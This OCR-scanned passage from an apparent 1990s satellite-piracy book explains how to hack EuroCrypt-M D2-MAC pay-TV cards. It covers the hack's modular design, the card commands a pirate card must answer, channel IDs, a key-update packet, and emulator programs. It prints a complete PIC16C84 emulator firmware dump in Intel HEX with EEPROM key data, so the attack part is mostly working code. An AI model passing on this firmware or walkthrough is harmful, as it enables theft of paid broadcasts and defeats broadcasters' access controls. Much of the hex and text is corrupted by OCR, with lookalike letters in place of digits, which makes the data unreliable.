Rdata 01D,061,046,0BA,0B4,0DD,0D9,080 
Rdata 0С8,016,03Ғ,049,073,0А8,0Е0,077 
Rdata 0AB,094,0F1,05F,062,00E,08C,0F3 
Rdata 005,0EB,05A,025,09E,032,027,0CC 


Rdata 0D7,01D,02D,0F8,08E,0DB,043,085 
Rdata 060,0A6,0F6,03F,0B9,070,01A,043 
Rdata 0A1,0C4,092,057,038,062,0E5 , OBC 
Rdata 05B,001,00C,0EA,0C4,09E,07F ,029 
Rdata 07A,023,0B6,01F ,049,0E0,010,076 
Rdata 09C,04A,0CB,0A1,0E7,08D,02D,0D8 
Rdata 00Ғ,0Ғ9,061,0С4,0А3,095,00Е,00В 
Rdata  0F5,03C,032,057,058,062,084,0BE 


This is the EEdata required for the above 

org 2100h 

data 0f2h, 099h, 000h, 000h, 018h, Oabh, 090h, 084h, 000һ 
data 058h, 001h, 000h, 000h, 007h, Odfh, 087h, 066h, 000h 
data 027h, 000h, 000h, 000h, 04еһ, Oe3h, Ofdh, 030h, 000h 
data 033h, 05сһ, 000һ, 000h, Ofdh, 094h, Ob7h, Oe4h, 000h 
data 0е5һ, 063h, 000h, 000h, Oefh, 009h, 085h, Odah, 000h 
data 079h, 0Ғ8һ, 000h, 000h, Of4h, 052h, 000h, Ofah, 000h 
data 061h, 050h, 000h, 000h, 050h, Odah, Odfh, 023h, 000h 
END 
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The Actual Hack 


As was mentioned earlier, once the decryption algorithm can be detached 
from the main access control routines, the system is dead. This also means 
that a hack on the system is greatly simplified as a result. 


EuroCrypt-M, like VideoCrypt-07 suffers from this fatal flaw. The access 
control aspect of EuroCrypt-M is good but the channels using the system 
either did not appreciate the system or they just did not know how to 
implement the system in order to stop piracy. Of course the fact that 
majority of the official cards in operation are EPROM has complicated the 
situation. 


Because the official cards are EPROM, they cannot be updated as regularly 
as would be required. Since each channel as configured in the official card 
effectively has only 8 operational keys, (keys used to encrypt the control 
word), updating these keys is a very limited option. 


The theory at the time of the creation of the system was that smart cards 
could not be hacked. This theory has been repeatedly proven wrong over 
the last few years. The immediate result for EuroCrypt-M channels using 
these EPROM cards is utter disaster. They are locked into a finite set of 
keys and there are few ECMs, if any, that they can implement. As was 
stated earlier, FilmNet and TV1000 may start to rotate keys on a more 
гедшаг basis, saving the updates to the remaining keys for special 
occasions such as Christmas or the most popular blockbusters. Of course 
once the hackers and pirates obtain all of the keys, the system will once 
more be completely compromised. The best that the channels can hope for 
is a temporary effect on the pirates as they may well have to add an 
EEPROM such as a 24C65 to the single PIC16C84 cards to cope with all 
the keys. Though with single PIC16C84 D2-MAC cards retailing currently for 
£5, people could afford a separate card for each channel thus neutralising 
the effect of the ECM. 


In theoretical terms, this hack can be reduced to four blocks: The Serial 
Interface, The Command Engine, The Fixed Responses and The Decryp- 
tion Algorithm. A fifth block, the Key Update Procedure is an optional 
element. 


This model can be applied to hacking any system. Indeed there are 
common areas between this hack on EuroCrypt and the VideoCrypt-07 and 
VideoCrypt-09 hacks. It is probable that a similar approach can be applied 
to the hack on the DirecTv system though this system differs in that it uses a 
data transmission rate of 38400 Baud. 
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Model Of The D2-MAC EuroCrypt Hack 








Serial Interface 
Routines 





CA 88 


Command Engine САСО 










Fixed 
Responses 


CA 88 
Channel 
IDs 
Crypto 


Key Update 
Procedure 


: Not used for FilmNet / TV1000 / TV3s 
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The Serial Interface 


The Serial Interface depends largely on the processor used. Most of the PC 
based hacks use the framework of the SEASON hack to provide the Serial 
Interface. Much of the PIC source code also uses a relatively common set 
of routines. This is due more to pirates pirating the pirates than to any single 
plan. 


The Command Engine 


The Command Engine is the heart of the hack. It is this module that 
processes the command packets and determines how the packets should 
be handled. In the example of documented single PIC16C84 source code, 
there are nine recognised commands. These commands are essentially all 
that need to be recognised in order to create a functional EuroCrypt hack. 


The Fixed Responses 


There are some responses in the EuroCrypt-M system that are fixed. The 
most obvious one of these is the Answer To Reset (ATR). Others are more 
general results of read operations. There is even a response for the card 
serial number. 


It appears that there is no real check on the card serial number in the 
EuroCrypt-M system. Many of the pirate cards return padded data or an 
error code to the decoder. A properly designed system would have 
integrated some form of serial number check routine. However it would 
have been very easy to overcome this by integrating a valid serial number. 


Alternatively since many of the decoders being used outside the primary 
areas of the channels are converted BSB IRDs, it would just be a case of 
modifying the EPROM routines in the IRD conversion. 


The Decryption Algorithm 


The decryption algorithm in EuroCrypt is DES based. The widespread 
availability of information on DES and how to implement it made it too easy. 
The implementation of DES in the single PIC is a good example of what is 
possible in such limited memory. 


Key Update Routine 


While this is not necessarily a part of most implementation, some channels 
such as Canal Plus or CineCinemas make good use of it by frequently 
updating the keys. However the hackers and pirates have the management 
keys used for this procedure. Apparently the Rendezvous channel makes 
regular use of this update procedure thus limiting the effect of a hack. 
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The Essential EuroCrypt-M Commands 


The EuroCrypt commands examined here are those necessary to create a 
hack. The hack is a bare metal one that functions properly and does not 
have any excess routines or enhancements. The full set of commands is 
available in the D2-MAC EuroCrypt specification document. 


That document does tend to reinforce the theory that the creators of the 
standard were paid by the number of routines and facilities that they could 
incorporate into the design. It seems that they wanted it do everything from 
Impulse PPV to subscriber surveys. It is not an optimised system and it 
seems that the only thing it cannot do is make the coffee. Of course there 
probably is a routine in there somewhere for ordering it. 


e Instruction: 87 02 
Direction: Decoder to Card 
Length: 3 Bytes 
Purpose: Retrieve Genera] Purpose FAC 
F, NP1, NP2 


e Instruction: 87 04 
Direction: Card to Decoder 
Length: 7 Bytes 
Purpose: Request result after selecting FAC 


Most implementations seem to reply with 00 15 00 00 FF FF FF. Others 
reply with 00 15 00 00 28 OF 04. 


e Instruction: 87 06 
Direction: Card to Decoder 
Length: 4 Bytes 
Purpose: Read block in FAC after selecting block. 
Most PIC implementations seem to reply with 10 02 CA 20 FF. The extra FF 
byte is padding. 
e Instruction: CA B8 


Direction: Card to Decoder 
Length: 6 Bytes 
Purpose: Read data 
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ө Instruction: СА А4 


Direction: Decoder to Card 

Length: Variable 

Purpose: Tells the card which channel is selected. 

CA A4 00 00 00 Select Issuer Entity 

CA A4 02 00 00 Select Next Issuer Entity 

CA A4 04 00 03 <DATA> Select Issuer Entity Direct 

The most significant 20 bits indicate the channel and the least significant 


nybble indicates the access mode. The following is a list of IDs that have 
been recorded over the last year or so (courtesy of William Jansen). 


Channel IDs 
00 04 00 TV3 Norway/Denmark/Sweden 00 2b 10 FilmNet 1 and 2 (s) 
00 04 00 TV6. ZTV Sweden 00 2b 20 CTV (s) 
00 04 Of FilmMax (defunct) 00 2b bO СТУ (s) 
00 04 10 TV1000 and TV1000 Cinema 00 2b с0 CTV (5) 
00 04 30 Thor CTV Channels 00 2c 10 TV Plus Select 
00 1c 00 France Telecom TV Feed 00 2d 10 Rendezvous 
00 24 10 CineCinephile 4:3 (+others) 00 2d 90 Rendezvous 
00 24 20 CineCinema 00 3c 00 MCM 
00 28 00 FilmNet 1 and FilmNet 2 00 48 00 TDF 19W 
00 28 10 BBC Prime 10 00 10 Canal Plus 4:3 
00 2c 00 TV Plus Holland 10 00 30 Canal Plus 16:9 


47 51 00 TV2 Norway 
e Instruction: CA 88 


Direction: Decoder to Card 

Purpose: Compute Control Word 

Length: Typically 24h (36 decimal) 

The EuroCrypt specification is not as elegantly optimised as the VideoCrypt 
system. The reason for this is that the EuroCrypt has a greater bandwidth 
than VideoCrypt. Therefore the optimisations and reuse of packets seen in 


VideoCrypt is not particularly necessary. The CA 88 packet carries the 
control word data. 


The decryption key is selected by the P2 byte in the packet. The format of 
the header is CA 88 00 0A 24. 
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The example above uses key ОА. Keys 08 to ОҒ are the operational keys 
and are used for control word generation. The keys 00 to 07 are 
management keys. The 24 is a hexadecimal indication of the length of the 
packet. 


The card has to send 77h before each byte that it receives. On many 
implementations, the preamble to the EA 10 <DATA> is dropped. The Ғ0 08 
bytes are answered with 89h and the checksum data is received in a single 
block. 


This checksum data is dropped by some of the simpler PIC16C84 
implementations. The more advanced ones use this in the packet check- 
summing routine. (see Chapter 6). 


CA 88 Example 1: TV1000 (Astra) 


Control Е0 01 00 

Date and Theme & Level E104 21 00 05 04 

Even and Odd Control Words ЕА 10 [16 Bytes of data] 
Hash Signature FO 08 [8 Bytes of data] 


CA 88 Example 2: FilmNet (Astra) 


Control Е0 01 00 

Date and Theme & Level E104 21 0С 05 01 

Even and Odd Control Words ЕА 10 [16 Bytes of data] 
Hash Signature FO 08 [8 Bytes of data] 


The CA 88 packet is broken into segments. This is in someways similar to 
the VideoCrypt 74h packet. The different segments of each packet are 
delimited by Marker Bytes. 

Marker Bytes: 

EO Control (Scrambled, Blackout or Clear) 

E1 Broadcast Date and Theme & Level 

E2 Broadcast Date and programme class 

E3 Programme Number 

E4 Programme Number and Cost 

E5 Programme Number and Cost Per Time 

E8 Even Control Word E9 Odd Control Word 

EA Even and Odd Control Word FO Hash Signature 
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The EO marker indicates that the packet is a control packet. It has a length 
of one byte and it seems to be indicate the status of the channel. It can 
also be used to signal a blackout or that the transmission is clear 
scrambled (not controlled access). 


The E1 indicates the broadcast date, and the theme and level of the 
programme. It has a length of 04 bytes as indicated by the E1 04 in the 
example. The broadcast date is indicated by the first two bytes. 


The seven most significant bits indicate the year. This is the number of 
years since 1980, which in this case is 16. The next four bits indicate the 
month, which in the example is 8 (August). The last five bits indicates the 
day, which in the example is OD. In decimal this is day 13. So from the 
example, the packet was transmitted on 13/August/1996. 


Broadcast Date 


HexadecimaTz210D The Decimal 16 is equal to the 


number of years since 1980. The 

Years Month Day other results are equal, in deci- 
Binary: 0010000 1000 01101 mal, to the month and the day. 
Decimal: 16 08 13 


The Theme and Level bytes are generally used to control access on the 
basis of Theme and Level of access. The card, (the official one), will check 
that it has a subscription valid for the broadcast date and valid for the theme 
and level of access. The first byte is the Theme byte and the second is the 
Level byte. If the Theme byte is FF then the Level byte is ignored. If the 
Theme (entitlement) byte in the card is FF then the card can access all 
levels. This is perhaps a Phoenix type weakness as the official card can be 
modified with the necessary data. The following Theme bytes have been 
recorded. (Courtesy of William Jansen). 


Theme Bytes 
ОО All 08 News 
01 Arts 09 Series 
02 Children OA Sports 
03 Club OB Special 
04 Entertainment OC Nature 
05 Film OD Documentary 
06 Lifestyle OE Miniseries 
07 Music OF Science 
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The EA Control Word marker is followed by a byte indicating the length of 
the subsequent data. While it is possible to send the Even and Odd control 
words separately in the packet by using the EA 08 <EVEN> EA 08 <ODD> 
though in the interests of economy, the control words are typically sent 
together as EA 10 <EVEN><ODD>. 


There are two other bytes at the start of the packet DF 00. The function of 
these bytes is not known yet though they may well be some form of control 
bytes. 


е Instruction: CA CO 


Direction: Card to Decoder 
Purpose: Return Results Of Control Word Computation 


This packet returns the results of the control word calculation to the 
decoder. It is headed by the marker byte EA and the length 10 (16 decimal). 


The Key Update Procedure 


This procedure is not strictly necessary in the majority of cases. Though 
FilmNet and TV1000 do aperiodically update their keys, the relevant 
Management Keys for these channels are not in widespread distribution. 
Without the correct Management Key, the procedure is useless. 


However not all channels are using the old EPROM technology cards. The 
Canal Plus cards seem to use the update procedure regularly. Therefore 
some understanding of the key update procedure is necessary. 


The update procedure uses the CA 18 instruction to change the data in the 
card. This is a powerful instruction and its application is not limited to key 
changes. It can be used to change or delete other data in the card. In some 
respects it is like the Nanocommands in the Sky 09 card. 


e Instruction: CA 18 
Direction: Decoder to Card 
Length: Variable 
Purpose: Enter Information 


According to the specification document, this command is used to enter 
information. The information can be the modification of an entity or perhaps 
more importantly from the hacker viewpoint, to modify keys. 
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The packet can be addressed to the entire audience, as indeed the Canal 
Plus updates are, or they cane addressed to shared groups or individual 
subscribers. This is signaled by the P1 byte. 
P1 Byte Meanings 

00 Entire Audience 

01 Shared Group 

02 Single Subscriber 
The P2 byte signals the key index to be updated. This packet also relies on 


marker bytes to divide the packet into segments. The marker bytes are 
followed by a length byte that indicates how many bytes are to follow. 


АО 01 Control 

А8 06 Dates, Themes and Levels 

A1 03 Update Channel and Key Number to be updated. 
EF 08 Encrypted New Key 

FO 08 Hash Signature 


The key length in DES and indeed in the EuroCrypt function is seven bytes. 
The last byte of the new key when processed through the algorithm should 
be OOh. If it is non-zero it indicates that an error has occurred. 


Example Of CA 18 Canal Plus Key Update 
CA 18 00 06 29 Header Indicating Management key and Op. Key 
A103 100026 Channel & Management Key To Be Used 
A806 1F901F95FFFF Date and Theme & Level 
A103 100029 Channel and Operational Key to be updated 
EF 08 ВО ПЕ 59 8р0 Еб 05 28 38 Encrypted Operational Key 
ҒО 08 38 40 ОВ АҒ 50 8E СО A9 Hash Signature 


The current situation with most of the D2-MAC channels is that the hackers 
do not have the management keys. Therefore every time there is a key 
change, they are left without the keys. However the commercial pirates do 
have the Management key. The result of every key update for the 
commercial pirates is more money from the upgrades. 
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e Instruction: CA 24 


Direction: Decoder to Card 

Purpose: Modify lock/unlock indicators 

Length: 9 Bytes 

This is a PIN (Personal Identification Number) controlled operation. It is 
used to change the status on PIN codes, maturity ratings or purchase 
ceiling. The PIN code is eight bytes long and the lock status is represented 
by the lower nybble of the last byte. On some of the battery cards this is 
used to update some of the keys. 


CA 24 00 00 09 Modify lock/unlock indicators 


The first eight bytes are the PIN number and the last byte represents the 
locks. The high nybble of the last byte is always Oh. A lock state is 
represented by 0 and an unlocked state is represented by 1. Bit 0 is the 
Impulse purchase bit. Bit 1 is the Maturity Rating bit. Bit 2 is the 
Consultation bit. Bit 3 is the Programme Preselection bit. 


CA 24 01 00 10 Modify PIN Code 


This changes the PIN code. The first eight bytes represent the existing PIN 
code and the following eight bytes represent the new PIN code. 


CA 24 02 00 09 Modify Maturity Rating 


The first eight bytes represent the PIN and the last byte represents the 
Maturity Rating. The high nybble of the last byte is Oh. This may be some 
form of parental lockout. 

CA 24 03 00 0C Modify Purchase Ceiling 


The first eight bytes are the PIN code and the next four bytes represent the 
purchase ceiling. The Most Significant Byte of the purchase ceiling is always 
00h. 

The significance of this instruction is that it is used to update the keys in the 
MultiMac program by Micheal Stegen. This means that a user can update 
his PIC16C84 card using the remote control handset rather than having to 
have the card inserted into a reprogrammer. 


e Instruction: CA 26 
Direction: Card to Decoder 
Purpose: ? 


The function of this packet is not known at this time. It may have something 
to do with the crypto algorithm in use. On EuroCrypt-M, this algorithm if 
signaled by 20h. 
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PIC Source Code And Emulator Programs 


There are many versions of the PIC16C84 D2-MAC EuroCrypt code 
available. If you log on to any specialised BBS or indeed any of the WWW 
sites listed earlier in the book, the chances are you are going to be spoiled 
for choice. 


Many of the programs available use common elements such as the serial 
interface routines and the crypto algorithm. The quality of the implementa- 
tions can vary but there are some excellent implementations. 


People take existing source code and work on it. Generally they improve it 
and, true to the Hacker Ethic they will release it into the public domain. Of 
course there are some, notably the commerical pirates, who would disagree 
with this. Their motives are purely financial. They after all do pay for the new 
codes and seeing them released on the internet and the BBSes shortly after 
a code change is upsetting. The result of this is that the newer cards used 
by the commercial pirates are more difficult to pop. The Rendezvous cards 
are a good example. The pirate cards do not use the PIC16C84 and thus 
the code is not widely available as is the code for TV1000 or FilmNet. 


The best and most supported emulator program for the PC at the moment is 
the Voyager by William Jansen and Toysoft This is a public domain 
program and it is also the best documented. The authors have incuded test 
details from most D2-MAC decoders and IRDs on the market in a 
mini-FAQ. 


Perhaps one of the most innovative and useful developments in the recent 
few months has been the MultiMac program from Michael Stegen. This is a 
program that runs under DOS that will allow the user to configure the code 
for a PIC16C84 single chip D2-MAC EuroCrypt card. 


The options on MultiMac allow the file format, the programming format and 
the output pin to be selected by the user. This has effectively given a new 
lifespan to the old Sky 09 pirate cards. They can now be reconfigured for 
D2-MAC EuroCrypt. An additional aspect of the MultiMac program is that 
the code on the PIC16C84 can be subsequently updated via the remote 
control handset of the D2-MAC decoder. This means that it is also 
extremely useful for dealers who can use the program for their own cards. 


The program can also provide code capable of being used on all of the 
more popular PIC16C84 programmers. The main programmers are the 
Henk Schaer programmer and the David Tait programmer. The Tait 
Programmer requires the program area and the EEPROM areas to be split. 
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PIC16C84 D2-MAC EuroCrypt Emulator 


Data = PIN 13 (RB7) 
:0800000021AA300900A0302929B03090216A080AC5 
:080008003908216A30F0058A301B00840A84218D6A 
:0800100000801E84280E300COOAF082F3E432028A5 
:08001800061D1903281E0BAF28152805082F3C07BD 
:080020001C032826081D08A01D03216A082F3E4F2F 
:080028000082343Ғ3467342Ғ3400341134143400Е8 
:08003000340334683410340234CA34203400348F 32 
:080038003400341534003404341434083434342097 
:080040003430340C340134183402340434B834A461 
:0800480034C03406342434AC3488341834F03426C4 
:08005000286529AF286E2891293E285F28762861DF 
:0800580029242908285D306E2806306B28063032A6 
:0800600029B030AC216A081E00AE03A01BA02805F9 
:08006800218D3A401C9E1903158A2865082E2165AA 
:080070000320216A03A01D03287128A4218D00887C 
:080078001D03287D0BA028762805301102881B8BD4 
:080080001C03287A218D00891A0915881A8917887E 
:0800880039070089151F20A607891820218D219F77 
1080090002 8A4189E28A2191E2899081E1903018C55 
:08009800280521802180390Ғ0080218039Ғ0068098 
:0800A000038C28050A8C1A0C158A280501AE30092C 
: O800A80000AF082F 3E3A20280601190328B4300774 
:0800800007AE0BAF28A934F10BAF28B81D1F34EAEF 
:0800B800082E000820A600893021008420C91F894D 
:0800С00028С308092028008004890484108428ВЕСС 
:0800С8000008168314081283080800083439347481 
:08000000340734С1343Ғ3418340034123437345АЕ6 
:0800D800344334E434A1344834BF346D34FE3499AD 
:0800Е0003469346334403489346134303438343Ғ08 
:0800E800347B34A83473341334C6348A343534FD45 
:0800F00034E7341934B2344034B3346E34B334D7CB 
:0800F80030140084300700AC20C90600190329031E 
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:0801000008000088219F0A840A890BAC28FC0008A3 
:080108001504089Е10032805080139СҒ100328057Ғ 
:0801100030152186218C009030CE1A103E0E189F93 
:080118003E0720BB218B21F31E103E0700891A0ADF 
:080120000A901C1020F82933178B080D0081120A49 
:08012800181F160A20BA301A218621F330080089D8 
:08013000301421BA21F3218B3089190A3019216A38 
:08013800300800AC218D0BAC293A28051E20294E31 
:0801400030EA216530102165300C00840800216AFE 
:080148000A840BA029460801008D2805080C3E3AB8 
:08015000202800AD390F300019033010182D304722 
:0801580021650820390Ғ19403Е201820305121652С 
:08016000082D380F2165303529B003A0296A30777A 
:08016800190A30E700AA09AA303221AB307F0066B5 
:0801700001AB1386300800A821AA082A06AB13861B 
:080178001BAA17860DAA0BA8297421AA13861FABE8 
:08018000178621AA30FF0066304F29AB02A0218CD8 
:080188000BA029870008218C21671B86298D302A26 
:0801900021AB300900A810031B8614030DAA21AA6D 
:080198000BA829930CAA302821AB092A0008168342 
:0801A00015083055008930AA00891488188829A6BE 
:0801A80012830008301B00A90BA929AC3400303899 
:0801B00000AD03A01BA02805082D20281F 2D0AAD8F 
:0801B800216A29B121BC29BD008421C021C021C0FO 
:0801C00008000088080902840808008008090784E4 
:0801C8000A8400081003180129DA19A4140311A4E1 
:0801D0000DA70DA60DA50DA40DA30DA20DA1180335 
:0801D800162400081A24140312240CA10CA20CA348 
:0801E0000CA40CA50CA60CA7180315A400080088ED 
:0801E8000C880C0806000A84393F0409202800887E 
:0801F00030400789000830180084218C00800A8478 
:0801F8001E8429F51C012A0730180095178322BD9B 
:080200000A951E9529FF30100089302821BA301040 
:0802080000A018011E202A0D2A1721CA0320190355 
:080210002A173C0D1C032A173A061D0321CA148A13 
:08021800100A3028009430CD0097300600960A97D7 
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:0802200008172028009539073Е200084009530Ғ0Ғ6 
:08022800059518030E950815100305001D0314030A 
:08023000081400840D800B962A1F130013800A946B 
:0802380019942A1D019401950197140A0189302807 
:0802400000840C1F0C1C21E71988179519081796BC 
:0802480018881496180814970D1D0D1C21EA19889A 
:0802500015951908161718881714180817160С1С6Е 
:080258000С1021Е71988141619081415188815178С 
:08026000180815140D1E0D1D21EA198817171908FD 
:08026800161618881715180817940C1D0C1E21E770 
:080270001B8814141B0815151A8817971A08169452 
:080278000D1F0D1E21EA1B8816141B0815971A88DE 
:0802800016951A0816960C1E0C1F21E71B881417D2 
:080288001B0816151A8815161A0814940D1C0D1F 34 
:0802900021EA1B8815941B0816971A8814951A08D2 
:0802980015960818069408190695081A0696081B5C 
:0802A0000697 30040089301C21BC30F800893014DE 
:0802A800218C0BA02A091C01341521CA301F00955E 
:0802B000138322BD300406951D152AB1039519152F 
:0802B8002AB130140089302829BA30280096081550 
:0802C00000841F832AC60D800D802AC70C8008166B 
:0802C80000840C800A961E162ABF000834A234430C 
:0802D0003412348B344134C13411340C349234A197 
:0802D80034C3342234933413340A34093424348933 
:0802E000348A34913414340B34C234213446340F04 
:0802Е800349434С53496349734А43480341734С60А 
:0802F0003445348E340E34473495348F342534C72E 
:0802F80034A634263427340D34C4348C0000000076 
:08030000342E34E034C434BF344D3427341134C47B 
:080308003472344E34AF 347234BB34DD346834115B 
:080310003483345A345A3406343634FC34FC34AB2F 
:08031800340534393409349534Е03483349734682Ғ 
:08032000344434BF3421348C341E34C834B8347275 
:0803280034AD341434D634E934723421348B34D7B8 
:0803300034FF3465349C34FB34C934033457349E69 
:08033800346334AA343A34403405345634E0343D1E 
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:0803400034CF34A3341134FD34A8344434FE342784 
:080348003496347Ғ342834С2346334983484345Е2Е 
:080350003409346С3407341034323401344034ЕА6Ғ 
:0803580034EC3406347034B93455343B34BA348513 
:080360003490344D34EE343834F7342A345B34C1B5 
:08036800342A34933484345F34CD34F4343134A2B9 
:08037000347534BB340834E6344C341734A6347C42 
:080378003419346034D3340534B2348E346F34D904 
:08038000344A34DD34B03407342934B034EE3479B7 
:0803880034Ғ6344334033494348Ғ3416340534АА09 
:08039000343134Е234С03438349С3455347734СЕ77 
:08039800345B342C34A434FB3462348F341834612D 
:0803A000341D3461344634BA34B434DD34D934804D 
:0803A80034C83416343F3449347334A834E03477D5 
:0803B00034AB349434F1345F3462340E348C34F327 
:0803B800340534EB345A3425349E3432342734CC6B 
:0803C00034D7341D342D34F8348E34DB344334854B 
:0803C800346034A634F6343F34B93470341A3443CC 
:0803D00034A134C4349234573438346234E534BCFC 
:0803D800345B3401340C34EA34C4349E347F342921 
:0803E000347A342334B6341F344934E03410347654 
:0803E800349C344A34CB34A134E7348D342D34D8A2 
:0803F000340F34F9346134C434A3349534DE340B17 
:0803Ғ80034Ғ5343С3432345734583462348434ВЕА7 
:01200700000107 
:08210000009900010000005С006300Ғ800500070С6 
:0821080000BF006E0051009F00B800A6001200063C 
:082110000028003A004B001D00E20087008500BA55 
:0821180000D500C8001100B400C2001500B7002DA2 
:08212000007С0093007900840066003000Е4000А57 
:0821280000ҒА0023005Е00ЕС00Е300580054006Е38 
:08213000008800110045006300400078004000ЕВ16 
:0821380000450008009500FF00ED0045002100105B 
:00000001FF 
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Postscript 


At this current point in time, most of the system in operation in Europe have been 
hacked. The only ones to remain largely intact have been those that are not used on 
major networks. However this does not protect them. Hackers are examining these 
decoders as well. 


The DirecTv system, VideoGuard has been compromised in North America. This 
system was the first truly digital television service to be hacked and it does not 
bode well for other services. However it must be said that it was News Datacom 
who were providing the security. 


While having News Datacom is not exactly a kiss of death for a system it is like 
the scent of blood to sharks. The sharks in this case being the hackers and pirates 
who had become familiar with the operation of VideoCrypt in Europe. Of course 
the VideoGuard system was a completely new system at the time. 


It was perhaps expected that this system would be hacked. It was developed 
around the same time as the VideoCrypt-II card and seem to use many of the same 
techniques. However it may also have built on the techniques used in the 09 Sky 
card. The problem here seems to be that the smart card used on all three services, 
VideoCrypt-1, VideoCrypt-II and DSS is one that had been popped successfully. 
Therefore when it came to popping the newest of these, the DSS card, the 
techniques had been perfected. 


The DirecTv system also seems to use the element of card-decoder personalisa- 
tion. This means that one card cannot be used in a multitude of decoders. There is 
a probable hack for this and it would not be unlikely to see a blocker device 
appearing. 


The fact that the DirecTv card appeared slightly before the 09 card may have some 
other significance. The NanoCommands that formed a cornerstone of the 09 card 
may not actually be present in the DirecTv card. If this is the case then the hack on 
this card is more serious than people realise. The true test of this will be seen when 
the Phoenixed cards start to appear on the market in decent numbers. 


According to some sources, the Phoenix Activator program for DSS was to be 
released on to the internet and the BBSes as retaliation for the DirecTv and News 
Datacom instigated raids in Canada. However the program has not yet appeared. 
This may be because the raids in Canada only represented a very small strike 
against piracy on the DirecTv system as a whole. 


Such a tactic of filing suit against foreign domiciled defendants in a US court is of 
questionable value. Sure it makes great headlines but it also fools the service, in 
this case DirecTv, into believing that it is really fighting piracy. It is a News 
Datacom tactic that we in Europe have become all too familiar with in the last few 
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years. The bungling of News Datacom and Sky’s lawyers, especially in Ireland, is 
legendary. But this tactic of making a wonderfully worded press release is at best 
ridiculous and at worst dangerous. 


It can make the lawyers look like fools when it dawns on people that the claims 
made really don’t hold up under scrutiny. Of course in a country were lawyers are 
despised, it can make people feel sorry for the pirates. 


Most of the DirecTv pirates are now operating from jurisdictions outside of the 
US. And it also seems that DirecTv and News Datacom have not filed suit against 
people in other jurisdictions. Interestingly they have filed suit against some one 
hundred people named John Doe. This guy must be a notorious pirate. Actually 
this apparently is a tactic when they do not know the names of the people involved 
in pirating the system. 


It is almost funny to remember that DirecTv executives were quoted in the press as 
saying that if nobody knew about the piracy on their system then it would not be a 
significant problem. And then they go and issue a press release telling people that 
their system is compromised and they are taking legal action against the pirates. 
Legal action? The executives of DirecTv were quoted as saying that their system 
contained wonderful elements that had not even been thought of when the Sky 09 
card was being pirated here in Europe. So where were these wonderful technical 
countermeasures? Perhaps they were a bit too technical for the minds of these 
executives. The only countermeasure to a totally compromised card is a new one. 


At this stage, there are rumours of a new DirecTv smart card issue. The switchover 
to the new card issue is supposed to occur in October. This may well happen even 
though the new cards seem to be thin on the ground at the moment. But it DirecTv 
should remember that it is always darkest before the dawn. At this time they should 
be expecting that a SEASON type hack will strike the system. 


The effect of a SEASON type hack on DirecTv would be far greater than an 
equivalent here in Europe. In the US and North America, computer ownership is 
higher. Most of the audience of DirecTv would probably have a PC and internet 
access. But it would be a short lived event especially if the new card appears on 
schedule. The new card will, in all probability be a development of the Sky 10 
card. It will certainly be an interesting Winter for DirecTv and the North American 
pirates and hackers. 


Closer to home, the most stunning news of the last few months is that the Nagra 
Syster SECAM is totally compromised. This hack had been known about for the 
last two years and it is expected that the compromised channels will implement 
some form of ECM. 


However the fact remains that the hacks are now in the public domain. The full 
PCB layouts, circuit diagrams and source code have been posted in various files on 
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the WWW sites listed in Chapter 5 and also on BBSes throughout Europe. There is 
a major reluctance of hackers and pirates in France to become directly involved in 
the distribution of pirate decoders. The legal framework in France is rather 
efficient. 


This hack is based on determining the sequence of the shuffle from analysis of the 
RBRB patterns characteristic of SECAM. Such a hack would not work on the PAL 
version. However the fact that the phase advances some 0.579 degrees in each line 
does give a potential starting point for a hack. 


The effectiveness of the hack on satellite delivered SECAM version of some of the 
Canal Plus channels may be limited. It seems that Canal Plus are making a 
concerted effort to go digital. This means that they will not be taking any more 
analogue subscriptions for their satellite channels from September. This will mean 
that the only real targets for the SECAM version will be the cablenet channels. 
These are in the jurisdiction of France. 


Over the next few months the Pay Television market in Europe will change. 
FilmNet and TV1000 may merge operations. This will result in a rationalisation of 
channels and some may disappear. FilmNet’s parent organisation have invested a 
colossal amount of finance in digital television and as yet there seems to be no 
immediate results. Whether they are long range visionaries will be decided soon. 
However a deal with DirecTv may also be in the offing here. 


It seems that the media analysts have got digital television wrong just as they were 
wrong about satellite television in general. Digital television is not going to be sold 
on its television programming. The main selling point of the new digital systems 
will be internet and WWW delivery. It will certainly be interesting to see who will 
make the running. It appears that Rupert Murdoch has already seen the opening. It 
remains to be seen if Nethold can do a tie up deal with some internet service 
provider. Murdoch purchased the Delphi system a few years ago. It will certainly 
be interesting to see if any new DirecTv tie-up in Europe uses this as its 
backchannel. 


One thing is certain; digital television will face more hackers and more threats than 
analogue satellite television ever faced. There inevitably will be hacks and they 
will be easier to distribute as they will be purely software. What better way to get 
these to the decoder than via the decoder’s internet connection? 
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The ASTRA Specifications For D-Type 
Interface 


The D-Type socket is used on many ASTRA receivers for 
interfacing the descrambler with the receiver. The function of each 
pin is given in the text table. 


Pin Connections Table: 
Pin Number 1: Return Audio Input Left 
Pin Number 2: Return Video Input PAL 
Pin Number 3: Video Switch Signal 
Pin Number 4: Baseband Output 
Pin Number 5: Clamped PAL Video Output 
Pin Number 6: Return Audio Input Right 
Pin Number 7: Audio Signal Switch 
Pin Number 8: Ground 
Pin Number 9: RESERVED 
Pin Number 10: RESERVED 
Pin Number 11: Ground 
Pin Number 12: Audio Output Left 
Pin Number 13: Audio Output Right 
Pin Number 14: RESERVED 
Pin Number 15: RESERVED 


The video and audio switch pins select the respective 
descrambler outputs. If the video is scrambled and the descrambler 
has a valid output, then the Video Switch pin will at ground. If the 
video is normal PAL and the descrambler is not active, the video 
switch will be at 12 Volts. This causes the receiver to select the 
descrambler video. 
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D-Type Connections 
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Pin 3 is the video switching control. 
12 V selects external source and 
OV selects internal. 


Pin 7 is the audio switching control. 
18 V selects external source and 
0 V selects internal. This pin is 
token low by an internal resistor. 
Unless audio scrambling is in use 
this pin should be left unconnected, 
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ASTRA Specifications For SCART Descrambler 
Interface 


The SCART socket is used on some receivers as a decoder 
interface. The use of loop through means that the operation of the 
descrambler is transparent and the customer will not ideally notice 
a transition from a clear station to a descrambled pay channel. 


Pin Connections Table 
Pin Number 1: Audio Output Right 
Pin Number 2: Return Audio Input Right 
Pin Number 3: Audio Output Left 
Pin Number 4: Audio Ground 
Pin Number 5: RESERVED 
Pin Number 6: Return Audio Input Left 
Pin Number 7: RESERVED 
Pin Number 8: Audio/Video Switch 
Pin Number 9 - 16: Reserved For Other Applications 
Pin Number 17: Video Output Ground 
Pin Number 18: Video Input Ground 
Pin Number 19: Baseband Output 
Pin Number 20: Return Video Input PAL 


Pin Number 21 Common Ground 
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Decoder SCART Connections 


As Viewed From Rear Of Receiver 
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Pin 4 is Audio Ground. 
Pin 17 is Baseband Output Ground 
